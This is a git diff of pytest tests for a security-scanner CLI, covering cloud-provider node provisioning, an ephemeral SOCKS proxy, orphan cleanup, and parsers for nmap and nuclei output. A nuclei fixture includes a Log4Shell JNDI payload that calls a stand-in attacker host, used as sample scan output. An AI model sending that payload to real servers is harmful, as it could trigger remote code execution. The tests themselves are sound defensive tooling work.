+        """active status but only private network — IP should be None."""
+        payload = {
+            "droplet": {
+                "status": "active",
+                "networks": {
+                    "v4": [{"type": "private", "ip_address": "10.10.0.5"}]
+                },
+            }
+        }
+        provider = _make_do_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("99999")
+        assert status == "active"
+        assert ip is None
+
+    @pytest.mark.asyncio
+    async def test_poll_status_off_status_maps_to_creating(self):
+        payload = {"droplet": {"status": "off", "networks": {}}}
+        provider = _make_do_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("99999")
+        assert status == "creating"
+
+
+class TestDigitalOceanProviderDestroyNode:
+    @pytest.mark.asyncio
+    async def test_destroy_node_204(self):
+        provider = _make_do_provider([_empty_response(204)])
+        # Should not raise
+        await provider.destroy_node("99999")
+
+    @pytest.mark.asyncio
+    async def test_destroy_node_404_idempotent(self):
+        provider = _make_do_provider([_empty_response(404)])
+        # Should not raise — idempotent delete
+        await provider.destroy_node("99999")
+
+    @pytest.mark.asyncio
+    async def test_destroy_node_500_raises(self):
+        provider = _make_do_provider([_empty_response(500)])
+        with pytest.raises(httpx.HTTPStatusError):
+            await provider.destroy_node("99999")
+
+
+class TestDigitalOceanWaitUntilReady:
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_success_first_poll(self):
+        payload = {
+            "droplet": {
+                "status": "active",
+                "networks": {"v4": [{"type": "public", "ip_address": "1.2.3.4"}]},
+            }
+        }
+        provider = _make_do_provider([_json_response(payload)])
+        ip = await provider.wait_until_ready("99999", poll_interval=0, max_polls=5)
+        assert ip == "1.2.3.4"
+
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_success_after_two_polls(self):
+        creating = {"droplet": {"status": "new", "networks": {}}}
+        active = {
+            "droplet": {
+                "status": "active",
+                "networks": {"v4": [{"type": "public", "ip_address": "9.9.9.9"}]},
+            }
+        }
+        provider = _make_do_provider(
+            [_json_response(creating), _json_response(active)]
+        )
+        ip = await provider.wait_until_ready("99999", poll_interval=0, max_polls=5)
+        assert ip == "9.9.9.9"
+
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_timeout(self):
+        creating = {"droplet": {"status": "new", "networks": {}}}
+        # Always returns creating
+        responses = [_json_response(creating)] * 3
+        provider = _make_do_provider(responses)
+        with pytest.raises(ProvisioningTimeout):
+            await provider.wait_until_ready("99999", poll_interval=0, max_polls=3)
+
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_error_state(self):
+        """If poll_status returns 'error', ProvisioningError should be raised."""
+        # We need a custom provider that returns error status
+        class ErrorProvider(DigitalOceanProvider):
+            async def poll_status(self, provider_id: str):
+                return "error", None
+
+        transport = httpx.MockTransport(lambda r: _empty_response(200))
+        client = httpx.AsyncClient(
+            base_url="https://api.digitalocean.com/v2",
+            transport=transport,
+        )
+        provider = ErrorProvider(client=client)
+        with pytest.raises(ProvisioningError, match="error state"):
+            await provider.wait_until_ready("99999", poll_interval=0, max_polls=5)
+
+
+# ---------------------------------------------------------------------------
+# VultrProvider
+# ---------------------------------------------------------------------------
+
+def _make_vultr_provider(responses: list[httpx.Response]) -> VultrProvider:
+    transport = _make_transport(responses)
+    client = httpx.AsyncClient(
+        base_url="https://api.vultr.com/v2",
+        transport=transport,
+    )
+    return VultrProvider(client=client)
+
+
+class TestVultrProviderCreateNode:
+    @pytest.mark.asyncio
+    async def test_create_node_returns_id(self):
+        payload = {"instance": {"id": "vultr-uuid-1234"}}
+        provider = _make_vultr_provider([_json_response(payload, 202)])
+        node_id = await provider.create_node(
+            region="ewr",
+            ssh_public_key="ssh-key-uuid",
+            tags=["ot-proxy"],
+        )
+        assert node_id == "vultr-uuid-1234"
+
+    @pytest.mark.asyncio
+    async def test_create_node_sshkey_id_is_present(self):
+        """CRITICAL: sshkey_id must be sent as an array."""
+        captured: list[httpx.Request] = []
+
+        def handler(req: httpx.Request) -> httpx.Response:
+            captured.append(req)
+            return _json_response({"instance": {"id": "abc"}}, 202)
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(
+            base_url="https://api.vultr.com/v2",
+            transport=transport,
+        )
+        provider = VultrProvider(client=client)
+        await provider.create_node(
+            region="ewr",
+            ssh_public_key="my-vultr-ssh-key-uuid",
+            tags=[],
+        )
+
+        body = json.loads(captured[0].content)
+        assert "sshkey_id" in body, "sshkey_id must be present in Vultr payload"
+        assert isinstance(body["sshkey_id"], list), "sshkey_id must be a list"
+        assert body["sshkey_id"] == ["my-vultr-ssh-key-uuid"]
+
+    @pytest.mark.asyncio
+    async def test_create_node_payload_fields(self):
+        captured: list[httpx.Request] = []
+
+        def handler(req: httpx.Request) -> httpx.Response:
+            captured.append(req)
+            return _json_response({"instance": {"id": "xyz"}}, 202)
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(
+            base_url="https://api.vultr.com/v2",
+            transport=transport,
+        )
+        provider = VultrProvider(client=client)
+        await provider.create_node(
+            region="sea",
+            ssh_public_key="key-uuid",
+            tags=["scan", "test"],
+        )
+
+        body = json.loads(captured[0].content)
+        assert body["region"] == "sea"
+        assert body["plan"] == "vc2-1c-0.5gb"
+        assert body["os_id"] == 2284
+        assert body["label"].startswith("ot-proxy-")
+        assert body["tags"] == ["scan", "test"]
+        assert body["backups"] == "disabled"
+        assert body["activation_email"] is False
+
+    @pytest.mark.asyncio
+    async def test_create_node_name_is_unique(self):
+        labels: list[str] = []
+
+        def handler(req: httpx.Request) -> httpx.Response:
+            body = json.loads(req.content)
+            labels.append(body["label"])
+            return _json_response({"instance": {"id": str(len(labels))}}, 202)
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(
+            base_url="https://api.vultr.com/v2",
+            transport=transport,
+        )
+        provider = VultrProvider(client=client)
+        await provider.create_node("ewr", "key", [])
+        await provider.create_node("ewr", "key", [])
+        assert labels[0] != labels[1]
+
+
+class TestVultrProviderPollStatus:
+    @pytest.mark.asyncio
+    async def test_poll_status_active_running_with_real_ip(self):
+        payload = {
+            "instance": {
+                "status": "active",
+                "power_status": "running",
+                "main_ip": "45.76.1.2",
+            }
+        }
+        provider = _make_vultr_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("vultr-id")
+        assert status == "active"
+        assert ip == "45.76.1.2"
+
+    @pytest.mark.asyncio
+    async def test_poll_status_zero_ip_treated_as_creating(self):
+        """Vultr reports 'active' before IP assigned — 0.0.0.0 must map to creating."""
+        payload = {
+            "instance": {
+                "status": "active",
+                "power_status": "running",
+                "main_ip": "0.0.0.0",
+            }
+        }
+        provider = _make_vultr_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("vultr-id")
+        assert status == "creating"
+        assert ip is None
+
+    @pytest.mark.asyncio
+    async def test_poll_status_active_not_running(self):
+        """active status but power_status != running — still creating."""
+        payload = {
+            "instance": {
+                "status": "active",
+                "power_status": "stopped",
+                "main_ip": "45.76.1.2",
+            }
+        }
+        provider = _make_vultr_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("vultr-id")
+        assert status == "creating"
+        assert ip is None
+
+    @pytest.mark.asyncio
+    async def test_poll_status_pending(self):
+        payload = {
+            "instance": {
+                "status": "pending",
+                "power_status": "stopped",
+                "main_ip": "0.0.0.0",
+            }
+        }
+        provider = _make_vultr_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("vultr-id")
+        assert status == "creating"
+        assert ip is None
+
+    @pytest.mark.asyncio
+    async def test_poll_status_missing_main_ip_defaults_to_zero(self):
+        """If main_ip key is absent, the 0.0.0.0 default guard kicks in."""
+        payload = {
+            "instance": {
+                "status": "active",
+                "power_status": "running",
+                # main_ip intentionally absent
+            }
+        }
+        provider = _make_vultr_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("vultr-id")
+        assert status == "creating"
+        assert ip is None
+
+
+class TestVultrProviderDestroyNode:
+    @pytest.mark.asyncio
+    async def test_destroy_node_204(self):
+        provider = _make_vultr_provider([_empty_response(204)])
+        await provider.destroy_node("vultr-id")
+
+    @pytest.mark.asyncio
+    async def test_destroy_node_404_idempotent(self):
+        provider = _make_vultr_provider([_empty_response(404)])
+        await provider.destroy_node("vultr-id")
+
+    @pytest.mark.asyncio
+    async def test_destroy_node_500_raises(self):
+        provider = _make_vultr_provider([_empty_response(500)])
+        with pytest.raises(httpx.HTTPStatusError):
+            await provider.destroy_node("vultr-id")
+
+
+class TestVultrProviderListNodesByTag:
+    @pytest.mark.asyncio
+    async def test_list_nodes_by_tag_returns_ids(self):
+        payload = {
+            "instances": [
+                {"id": "id-a", "tag": "ot-proxy"},
+                {"id": "id-b", "tag": "ot-proxy"},
+            ]
+        }
+        provider = _make_vultr_provider([_json_response(payload)])
+        ids = await provider.list_nodes_by_tag("ot-proxy")
+        assert ids == ["id-a", "id-b"]
+
+    @pytest.mark.asyncio
+    async def test_list_nodes_by_tag_empty(self):
+        payload = {"instances": []}
+        provider = _make_vultr_provider([_json_response(payload)])
+        ids = await provider.list_nodes_by_tag("ot-proxy")
+        assert ids == []
+
+    @pytest.mark.asyncio
+    async def test_list_nodes_by_tag_sends_tag_param(self):
+        captured: list[httpx.Request] = []
+
+        def handler(req: httpx.Request) -> httpx.Response:
+            captured.append(req)
+            return _json_response({"instances": []})
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(
+            base_url="https://api.vultr.com/v2",
+            transport=transport,
+        )
+        provider = VultrProvider(client=client)
+        await provider.list_nodes_by_tag("my-tag")
+
+        assert len(captured) == 1
+        assert "tag=my-tag" in str(captured[0].url)
+
+
+class TestVultrWaitUntilReady:
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_success(self):
+        active = {
+            "instance": {
+                "status": "active",
+                "power_status": "running",
+                "main_ip": "203.0.113.5",
+            }
+        }
+        provider = _make_vultr_provider([_json_response(active)])
+        ip = await provider.wait_until_ready("vultr-id", poll_interval=0, max_polls=5)
+        assert ip == "203.0.113.5"
+
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_skips_zero_ip_then_succeeds(self):
+        zero_ip = {
+            "instance": {
+                "status": "active",
+                "power_status": "running",
+                "main_ip": "0.0.0.0",
+            }
+        }
+        real_ip = {
+            "instance": {
+                "status": "active",
+                "power_status": "running",
+                "main_ip": "203.0.113.5",
+            }
+        }
+        provider = _make_vultr_provider(
+            [_json_response(zero_ip), _json_response(real_ip)]
+        )
+        ip = await provider.wait_until_ready("vultr-id", poll_interval=0, max_polls=5)
+        assert ip == "203.0.113.5"
+
+    @pytest.mark.asyncio
+    async def test_wait_until_ready_timeout(self):
+        creating = {
+            "instance": {
+                "status": "pending",
+                "power_status": "stopped",
+                "main_ip": "0.0.0.0",
+            }
+        }
+        responses = [_json_response(creating)] * 3
+        provider = _make_vultr_provider(responses)
+        with pytest.raises(ProvisioningTimeout):
+            await provider.wait_until_ready("vultr-id", poll_interval=0, max_polls=3)
diff --git a/packages/cli/tests/test_scanner/test_infra_proxy.py b/packages/cli/tests/test_scanner/test_infra_proxy.py
new file mode 100644
index 0000000..501bc36
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_infra_proxy.py
@@ -0,0 +1,148 @@
+"""Tests for ephemeral_proxy context manager and ProxyEndpoint."""
+from __future__ import annotations
+
+import asyncio
+import os
+
+import pytest
+
+from opentools.scanner.infra.provider import CloudNodeProvider, ProvisioningError
+from opentools.scanner.infra.proxy import (
+    ProxyEndpoint,
+    _shielded_destroy,
+    ephemeral_proxy,
+)
+
+
+# ---------------------------------------------------------------------------
+# FakeProvider — in-memory, no real cloud calls
+# ---------------------------------------------------------------------------
+
+
+class FakeProvider(CloudNodeProvider):
+    def __init__(
+        self,
+        ready_after_polls: int = 1,
+        ip_address: str = "1.2.3.4",
+        fail_create: bool = False,
+        fail_destroy: bool = False,
+    ) -> None:
+        self.ready_after_polls = ready_after_polls
+        self.ip_address = ip_address
+        self.fail_create = fail_create
+        self.fail_destroy = fail_destroy
+        self.created_ids: list[str] = []
+        self.destroyed_ids: list[str] = []
+        self._poll_count = 0
+
+    async def create_node(self, region: str, ssh_public_key: str, tags: list[str]) -> str:
+        if self.fail_create:
+            raise ProvisioningError("create failed")
+        node_id = f"fake-{len(self.created_ids)}"
+        self.created_ids.append(node_id)
+        return node_id
+
+    async def poll_status(self, provider_id: str) -> tuple[str, str | None]:
+        self._poll_count += 1
+        if self._poll_count >= self.ready_after_polls:
+            return "active", self.ip_address
+        return "creating", None
+
+    async def destroy_node(self, provider_id: str) -> None:
+        if self.fail_destroy:
+            raise ProvisioningError("destroy failed")
+        self.destroyed_ids.append(provider_id)
+
+
+# ---------------------------------------------------------------------------
+# TestProxyEndpoint
+# ---------------------------------------------------------------------------
+
+
+class TestProxyEndpoint:
+    def test_env_includes_proxy_vars(self) -> None:
+        """All 5 proxy env vars are set with socks5://127.0.0.1:PORT."""
+        endpoint = ProxyEndpoint(host="1.2.3.4", socks_port=10800)
+        env = endpoint.env
+        expected_url = "socks5://127.0.0.1:10800"
+        assert env["HTTP_PROXY"] == expected_url
+        assert env["HTTPS_PROXY"] == expected_url
+        assert env["http_proxy"] == expected_url
+        assert env["https_proxy"] == expected_url
+        assert env["ALL_PROXY"] == expected_url
+
+    def test_env_inherits_parent_env(self) -> None:
+        """PATH (or Path on Windows) is present from the parent environment."""
+        endpoint = ProxyEndpoint(host="1.2.3.4", socks_port=10800)
+        env = endpoint.env
+        # On Windows the key may be 'Path'; check case-insensitively.
+        lower_keys = {k.lower() for k in env}
+        assert "path" in lower_keys
+
+
+# ---------------------------------------------------------------------------
+# TestShieldedDestroy
+# ---------------------------------------------------------------------------
+
+
+class TestShieldedDestroy:
+    @pytest.mark.asyncio
+    async def test_normal_destroy(self) -> None:
+        """Happy path: provider.destroyed_ids contains the node after destroy."""
+        provider = FakeProvider()
+        node_id = "fake-0"
+        provider.created_ids.append(node_id)
+
+        await _shielded_destroy(provider, node_id)
+
+        assert node_id in provider.destroyed_ids
+
+    @pytest.mark.asyncio
+    async def test_destroy_failure_does_not_raise(self) -> None:
+        """A destroy failure is logged but does not propagate."""
+        provider = FakeProvider(fail_destroy=True)
+        # Should complete without raising even though destroy raises internally.
+        await _shielded_destroy(provider, "fake-0")  # must not raise
+
+
+# ---------------------------------------------------------------------------
+# TestEphemeralProxyLifecycle
+# ---------------------------------------------------------------------------
+
+
+class TestEphemeralProxyLifecycle:
+    @pytest.mark.asyncio
+    async def test_provision_and_teardown(self) -> None:
+        """Happy path: after __aexit__, exactly one node created and destroyed."""
+        provider = FakeProvider(ready_after_polls=1)
+
+        async with ephemeral_proxy(provider, _skip_tunnel=True) as endpoint:
+            assert endpoint.host == "1.2.3.4"
+            assert endpoint.socks_port == 10800
+
+        assert len(provider.created_ids) == 1
+        assert provider.created_ids == provider.destroyed_ids
+
+    @pytest.mark.asyncio
+    async def test_teardown_on_exception(self) -> None:
+        """Body raises ValueError — node is still destroyed in finally block."""
+        provider = FakeProvider(ready_after_polls=1)
+
+        with pytest.raises(ValueError, match="body error"):
+            async with ephemeral_proxy(provider, _skip_tunnel=True):
+                raise ValueError("body error")
+
+        assert len(provider.created_ids) == 1
+        assert provider.destroyed_ids == provider.created_ids
+
+    @pytest.mark.asyncio
+    async def test_create_failure_no_destroy(self) -> None:
+        """create_node raises ProvisioningError — destroy is never called."""
+        provider = FakeProvider(fail_create=True)
+
+        with pytest.raises(ProvisioningError, match="create failed"):
+            async with ephemeral_proxy(provider, _skip_tunnel=True):
+                pass  # pragma: no cover
+
+        assert provider.created_ids == []
+        assert provider.destroyed_ids == []
diff --git a/packages/cli/tests/test_scanner/test_infra_sweeper.py b/packages/cli/tests/test_scanner/test_infra_sweeper.py
new file mode 100644
index 0000000..1e7c91c
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_infra_sweeper.py
@@ -0,0 +1,81 @@
+"""Tests for sweep_orphaned_nodes."""
+from __future__ import annotations
+
+import pytest
+
+from opentools.scanner.infra.sweeper import sweep_orphaned_nodes
+
+
+# ---------------------------------------------------------------------------
+# Fake providers
+# ---------------------------------------------------------------------------
+
+
+class FakeSweepProvider:
+    """Provider that supports list_nodes_by_tag and destroy_node."""
+
+    def __init__(self, orphan_ids: list[str], fail_on: set[str] | None = None) -> None:
+        self.orphan_ids = list(orphan_ids)
+        self.fail_on: set[str] = fail_on or set()
+        self.destroyed_ids: list[str] = []
+
+    async def list_nodes_by_tag(self, tag: str) -> list[str]:
+        return list(self.orphan_ids)
+
+    async def destroy_node(self, node_id: str) -> None:
+        if node_id in self.fail_on:
+            raise RuntimeError(f"destroy failed for {node_id}")
+        self.destroyed_ids.append(node_id)
+
+
+class NoListProvider:
+    """Provider that lacks list_nodes_by_tag entirely."""
+
+    async def destroy_node(self, node_id: str) -> None:
+        pass  # pragma: no cover
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+
+class TestSweepOrphanedNodes:
+    @pytest.mark.asyncio
+    async def test_destroys_orphans(self) -> None:
+        """Two orphan IDs are both destroyed; returns 2."""
+        provider = FakeSweepProvider(orphan_ids=["node-1", "node-2"])
+
+        count = await sweep_orphaned_nodes(provider)
+
+        assert count == 2
+        assert set(provider.destroyed_ids) == {"node-1", "node-2"}
+
+    @pytest.mark.asyncio
+    async def test_no_orphans(self) -> None:
+        """Empty list from provider returns 0 without calling destroy."""
+        provider = FakeSweepProvider(orphan_ids=[])
+
+        count = await sweep_orphaned_nodes(provider)
+
+        assert count == 0
+        assert provider.destroyed_ids == []
+
+    @pytest.mark.asyncio
+    async def test_destroy_failure_continues(self) -> None:
+        """One node fails to destroy; the other succeeds; returns 1."""
+        provider = FakeSweepProvider(orphan_ids=["node-ok", "node-bad"], fail_on={"node-bad"})
+
+        count = await sweep_orphaned_nodes(provider)
+
+        assert count == 1
+        assert provider.destroyed_ids == ["node-ok"]
+
+    @pytest.mark.asyncio
+    async def test_provider_without_list_method(self) -> None:
+        """Provider without list_nodes_by_tag returns 0 immediately."""
+        provider = NoListProvider()
+
+        count = await sweep_orphaned_nodes(provider)
+
+        assert count == 0
diff --git a/packages/cli/tests/test_scanner/test_models.py b/packages/cli/tests/test_scanner/test_models.py
index efa722c..928b79e 100644
--- a/packages/cli/tests/test_scanner/test_models.py
+++ b/packages/cli/tests/test_scanner/test_models.py
@@ -119,7 +119,7 @@ def test_all_values(self):
         assert TaskStatus.SKIPPED == "skipped"
 
     def test_count(self):
-        assert len(list(TaskStatus)) == 6
+        assert len(list(TaskStatus)) == 7
 
 
 class TestExecutionTier:
diff --git a/packages/cli/tests/test_scanner/test_mutation_analyzer.py b/packages/cli/tests/test_scanner/test_mutation_analyzer.py
new file mode 100644
index 0000000..b818037
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_mutation_analyzer.py
@@ -0,0 +1,323 @@
+"""Tests for OutputAnalyzer protocol, NmapAnalyzer, NucleiAnalyzer, and AnalyzerRegistry."""
+from __future__ import annotations
+
+import pytest
+
+from opentools.scanner.mutation.analyzer import (
+    AnalyzerRegistry,
+    NmapAnalyzer,
+    NucleiAnalyzer,
+    OutputAnalyzer,
+)
+from opentools.scanner.mutation.models import IntelBundle
+
+
+# ---------------------------------------------------------------------------
+# Fixtures — Nmap XML
+# ---------------------------------------------------------------------------
+
+NMAP_TWO_OPEN_ONE_CLOSED = """\
+<?xml version="1.0" encoding="UTF-8"?>
+<nmaprun scanner="nmap" args="nmap -sV -oX - 10.0.0.1" start="1700000000" version="7.94">
+  <host starttime="1700000001" endtime="1700000002">
+    <status state="up" reason="echo-reply"/>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <hostnames>
+      <hostname name="target.local" type="PTR"/>
+    </hostnames>
+    <ports>
+      <port protocol="tcp" portid="22">
+        <state state="closed" reason="reset"/>
+        <service name="ssh" product="OpenSSH" version="8.9p1"/>
+      </port>
+      <port protocol="tcp" portid="80">
+        <state state="open" reason="syn-ack"/>
+        <service name="http" product="Apache httpd" version="2.4.54"/>
+      </port>
+      <port protocol="tcp" portid="6379">
+        <state state="open" reason="syn-ack"/>
+        <service name="redis" product="Redis key-value store" version="7.0.8"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>
+"""
+
+NMAP_NO_OPEN_PORTS = """\
+<?xml version="1.0" encoding="UTF-8"?>
+<nmaprun scanner="nmap" version="7.94">
+  <host>
+    <address addr="192.168.1.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="443">
+        <state state="filtered" reason="no-response"/>
+        <service name="https"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>
+"""
+
+NMAP_MULTI_HOST = """\
+<?xml version="1.0" encoding="UTF-8"?>
+<nmaprun scanner="nmap" version="7.94">
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="22">
+        <state state="open" reason="syn-ack"/>
+        <service name="ssh" product="OpenSSH" version="8.9"/>
+      </port>
+    </ports>
+  </host>
+  <host>
+    <address addr="10.0.0.2" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="3306">
+        <state state="open" reason="syn-ack"/>
+        <service name="mysql" product="MySQL" version="8.0.31"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>
+"""
+
+# ---------------------------------------------------------------------------
+# Fixtures — Nuclei JSON-lines
+# ---------------------------------------------------------------------------
+
+NUCLEI_TWO_VULNS = """\
+{"template-id":"CVE-2021-44228","host":"https://example.com","port":443,"matched-at":"https://example.com/log4shell","info":{"severity":"critical","name":"Log4Shell"},"extracted-results":["jndi:ldap://attacker.com/a"]}
+{"template-id":"exposed-git","host":"https://example.com","port":80,"matched-at":"https://example.com/.git/config","info":{"severity":"medium","name":"Exposed Git"}}
+"""
+
+
+# ---------------------------------------------------------------------------
+# TestNmapAnalyzer
+# ---------------------------------------------------------------------------
+
+
+class TestNmapAnalyzer:
+    def setup_method(self):
+        self.analyzer = NmapAnalyzer()
+
+    def test_tool_name(self):
+        assert self.analyzer.tool == "nmap"
+
+    def test_implements_protocol(self):
+        assert isinstance(self.analyzer, OutputAnalyzer)
+
+    def test_extracts_open_services(self):
+        bundle = self.analyzer.analyze(NMAP_TWO_OPEN_ONE_CLOSED, "")
+        assert len(bundle.services) == 2
+
+        # Check both ports are present
+        ports = {svc.port for svc in bundle.services}
+        assert ports == {80, 6379}
+
+    def test_service_fields_http(self):
+        bundle = self.analyzer.analyze(NMAP_TWO_OPEN_ONE_CLOSED, "")
+        http_svcs = [s for s in bundle.services if s.port == 80]
+        assert len(http_svcs) == 1
+        svc = http_svcs[0]
+        assert svc.host == "10.0.0.1"
+        assert svc.protocol == "tcp"
+        assert svc.service == "http"
+        assert svc.product == "Apache httpd"
+        assert svc.version == "2.4.54"
+
+    def test_service_fields_redis(self):
+        bundle = self.analyzer.analyze(NMAP_TWO_OPEN_ONE_CLOSED, "")
+        redis_svcs = [s for s in bundle.services if s.port == 6379]
+        assert len(redis_svcs) == 1
+        svc = redis_svcs[0]
+        assert svc.host == "10.0.0.1"
+        assert svc.service == "redis"
+        assert svc.product == "Redis key-value store"
+        assert svc.version == "7.0.8"
+
+    def test_skips_closed_ports(self):
+        bundle = self.analyzer.analyze(NMAP_TWO_OPEN_ONE_CLOSED, "")
+        # SSH port 22 is closed — must not appear
+        ssh_ports = [s for s in bundle.services if s.port == 22]
+        assert ssh_ports == []
+
+    def test_no_open_ports_returns_empty(self):
+        bundle = self.analyzer.analyze(NMAP_NO_OPEN_PORTS, "")
+        assert bundle.services == []
+        assert isinstance(bundle, IntelBundle)
+
+    def test_multi_host(self):
+        bundle = self.analyzer.analyze(NMAP_MULTI_HOST, "")
+        assert len(bundle.services) == 2
+        hosts = {svc.host for svc in bundle.services}
+        assert hosts == {"10.0.0.1", "10.0.0.2"}
+        services = {svc.service for svc in bundle.services}
+        assert services == {"ssh", "mysql"}
+
+    def test_invalid_xml_returns_empty(self):
+        bundle = self.analyzer.analyze("this is not xml <<<", "")
+        assert bundle.services == []
+        assert isinstance(bundle, IntelBundle)
+
+    def test_empty_stdout_returns_empty(self):
+        bundle = self.analyzer.analyze("", "")
+        assert bundle.services == []
+        assert isinstance(bundle, IntelBundle)
+
+    def test_whitespace_only_stdout_returns_empty(self):
+        bundle = self.analyzer.analyze("   \n\t  ", "")
+        assert bundle.services == []
+
+    def test_wrong_root_tag_returns_empty(self):
+        bundle = self.analyzer.analyze("<scanresult><host/></scanresult>", "")
+        assert bundle.services == []
+
+    def test_no_vulns_or_urls_in_nmap_bundle(self):
+        bundle = self.analyzer.analyze(NMAP_TWO_OPEN_ONE_CLOSED, "")
+        assert bundle.vulns == []
+        assert bundle.urls == []
+
+
+# ---------------------------------------------------------------------------
+# TestNucleiAnalyzer
+# ---------------------------------------------------------------------------
+
+
+class TestNucleiAnalyzer:
+    def setup_method(self):
+        self.analyzer = NucleiAnalyzer()
+
+    def test_tool_name(self):
+        assert self.analyzer.tool == "nuclei"
+
+    def test_implements_protocol(self):
+        assert isinstance(self.analyzer, OutputAnalyzer)
+
+    def test_extracts_vulns_count(self):
+        bundle = self.analyzer.analyze(NUCLEI_TWO_VULNS, "")
+        assert len(bundle.vulns) == 2
+
+    def test_extracts_template_ids(self):
+        bundle = self.analyzer.analyze(NUCLEI_TWO_VULNS, "")
+        template_ids = {v.template_id for v in bundle.vulns}
+        assert template_ids == {"CVE-2021-44228", "exposed-git"}
+
+    def test_vuln_fields_log4shell(self):
+        bundle = self.analyzer.analyze(NUCLEI_TWO_VULNS, "")
+        log4 = next(v for v in bundle.vulns if v.template_id == "CVE-2021-44228")
+        assert log4.host == "https://example.com"
+        assert log4.port == 443
+        assert log4.severity == "critical"
+        assert log4.matched_at == "https://example.com/log4shell"
+
+    def test_vuln_fields_exposed_git(self):
+        bundle = self.analyzer.analyze(NUCLEI_TWO_VULNS, "")
+        git = next(v for v in bundle.vulns if v.template_id == "exposed-git")
+        assert git.port == 80
+        assert git.severity == "medium"
+        assert git.matched_at == "https://example.com/.git/config"
+
+    def test_port_is_int(self):
+        bundle = self.analyzer.analyze(NUCLEI_TWO_VULNS, "")
+        for vuln in bundle.vulns:
+            assert isinstance(vuln.port, int)
+
+    def test_extracts_urls_from_matched_at(self):
+        bundle = self.analyzer.analyze(NUCLEI_TWO_VULNS, "")
+        assert "https://example.com/log4shell" in bundle.urls
+        assert "https://example.com/.git/config" in bundle.urls
+
+    def test_extracted_results_stored(self):
+        bundle = self.analyzer.analyze(NUCLEI_TWO_VULNS, "")
+        log4 = next(v for v in bundle.vulns if v.template_id == "CVE-2021-44228")
+        assert "extracted_results" in log4.extracted_data
+        assert log4.extracted_data["extracted_results"] == ["jndi:ldap://attacker.com/a"]
+
+    def test_empty_output_returns_empty(self):
+        bundle = self.analyzer.analyze("", "")
+        assert bundle.vulns == []
+        assert bundle.urls == []
+        assert isinstance(bundle, IntelBundle)
+
+    def test_whitespace_only_returns_empty(self):
+        bundle = self.analyzer.analyze("   \n   ", "")
+        assert bundle.vulns == []
+
+    def test_invalid_json_lines_skipped(self):
+        mixed = 'not json at all\n{"template-id":"test-id","host":"h","matched-at":"http://h","info":{"severity":"low"}}\nbad line'
+        bundle = self.analyzer.analyze(mixed, "")
+        assert len(bundle.vulns) == 1
+        assert bundle.vulns[0].template_id == "test-id"
+
+    def test_all_invalid_json_returns_empty(self):
+        bad = "garbage\nnot json\n{broken"
+        bundle = self.analyzer.analyze(bad, "")
+        assert bundle.vulns == []
+        assert bundle.urls == []
+
+    def test_no_services_in_nuclei_bundle(self):
+        bundle = self.analyzer.analyze(NUCLEI_TWO_VULNS, "")
+        assert bundle.services == []
+
+    def test_extracted_results_string_ignored(self):
+        line = '{"template-id":"test-str","host":"h","matched-at":"http://h","info":{"severity":"low"},"extracted-results":"single string"}'
+        bundle = self.analyzer.analyze(line, "")
+        assert len(bundle.vulns) == 1
+        assert "extracted_results" not in bundle.vulns[0].extracted_data
+
+    def test_extracted_results_null_ignored(self):
+        line = '{"template-id":"test-null","host":"h","matched-at":"http://h","info":{"severity":"low"},"extracted-results":null}'
+        bundle = self.analyzer.analyze(line, "")
+        assert len(bundle.vulns) == 1
+        assert "extracted_results" not in bundle.vulns[0].extracted_data
+
+
+# ---------------------------------------------------------------------------
+# TestAnalyzerRegistry
+# ---------------------------------------------------------------------------
+
+
+class TestAnalyzerRegistry:
+    def setup_method(self):
+        self.registry = AnalyzerRegistry()
+
+    def test_register_and_get(self):
+        analyzer = NmapAnalyzer()
+        self.registry.register(analyzer)
+        result = self.registry.get("nmap")
+        assert result is analyzer
+
+    def test_get_missing_returns_none(self):
+        result = self.registry.get("nonexistent_tool")
+        assert result is None
+
+    def test_register_overwrites_existing(self):
+        a1 = NmapAnalyzer()
+        a2 = NmapAnalyzer()
+        self.registry.register(a1)
+        self.registry.register(a2)
+        assert self.registry.get("nmap") is a2
+
+    def test_get_builtin_analyzers(self):
+        self.registry.register_builtins()
+        nmap_analyzer = self.registry.get("nmap")
+        nuclei_analyzer = self.registry.get("nuclei")
+        assert nmap_analyzer is not None
+        assert nuclei_analyzer is not None
+        assert isinstance(nmap_analyzer, NmapAnalyzer)
+        assert isinstance(nuclei_analyzer, NucleiAnalyzer)
+
+    def test_builtins_are_functional(self):
+        self.registry.register_builtins()
+        nmap = self.registry.get("nmap")
+        bundle = nmap.analyze(NMAP_TWO_OPEN_ONE_CLOSED, "")
+        assert len(bundle.services) == 2
+
+        nuclei = self.registry.get("nuclei")
+        bundle = nuclei.analyze(NUCLEI_TWO_VULNS, "")
+        assert len(bundle.vulns) == 2
+
+    def test_registry_starts_empty(self):
+        assert self.registry.get("nmap") is None
+        assert self.registry.get("nuclei") is None
diff --git a/packages/cli/tests/test_scanner/test_mutation_models.py b/packages/cli/tests/test_scanner/test_mutation_models.py
new file mode 100644
index 0000000..74edaf2
--- /dev/null
